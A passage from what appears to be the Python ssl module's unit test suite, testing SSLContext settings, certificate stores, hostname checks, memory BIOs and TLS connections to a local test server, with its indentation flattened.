ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
